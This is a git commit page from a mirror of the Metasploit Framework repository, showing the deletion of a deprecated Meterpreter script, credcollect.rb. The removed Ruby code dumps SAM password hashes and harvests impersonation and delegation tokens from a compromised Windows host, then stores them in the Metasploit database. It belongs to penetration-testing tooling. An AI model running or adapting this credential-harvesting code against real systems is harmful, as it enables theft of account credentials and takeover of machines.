1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-07-18 18:31:41 +02:00

Remove scripts/meterpreter/credcollect.rb

This commit is contained in:
bcoles 2022-08-08 17:36:12 +10:00
parent 8b3e9f89b5
commit cab4c1a297
No known key found for this signature in database
GPG Key ID: 3EB700FCFBA899B5

View File

@ -1,80 +0,0 @@
##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
# credcollect - tebo[at]attackresearch.com
opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ],
"-p" => [ true,"The SMB port used to associate credentials."]
)
smb_port = 445
opts.parse(args) { |opt, idx, val|
case opt
when "-h"
print_line("CredCollect -- harvest credentials found on the host and store them in the database")
print_line("USAGE: run credcollect")
print_line(opts.usage)
raise Rex::Script::Completed
when "-p" # This ought to read from the exploit's datastore.
smb_port = val.to_i
end
}
if client.platform == 'windows'
# Collect even without a database to store them.
db_ok = client.framework.db.active
# Make sure we're rockin Priv and Incognito
client.core.use("priv") if not client.respond_to?("priv")
client.core.use("incognito") if not client.respond_to?("incognito")
# It wasn't me mom! Stinko did it!
hashes = client.priv.sam_hashes
# Target infos for the db record
addr = client.sock.peerhost
# client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)
# Record hashes to the running db instance
print_good "Collecting hashes..."
hashes.each do |hash|
data = {}
data[:host] = addr
data[:port] = smb_port
data[:sname] = 'smb'
data[:user] = hash.user_name
data[:pass] = hash.lanman + ":" + hash.ntlm
data[:type] = "smb_hash"
data[:active] = true
print_line " Extracted: #{data[:user]}:#{data[:pass]}"
client.framework.db.report_auth_info(data) if db_ok
end
# Record user tokens
tokens = client.incognito.incognito_list_tokens(0)
raise Rex::Script::Completed if not tokens
# Meh, tokens come to us as a formatted string
print_good "Collecting tokens..."
(tokens["delegation"] + tokens["impersonation"]).split("\n").each do |token|
data = {}
data[:host] = addr
data[:type] = 'smb_token'
data[:data] = token
data[:update] = :unique_data
print_line " #{data[:data]}"
client.framework.db.report_note(data) if db_ok
end
raise Rex::Script::Completed
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end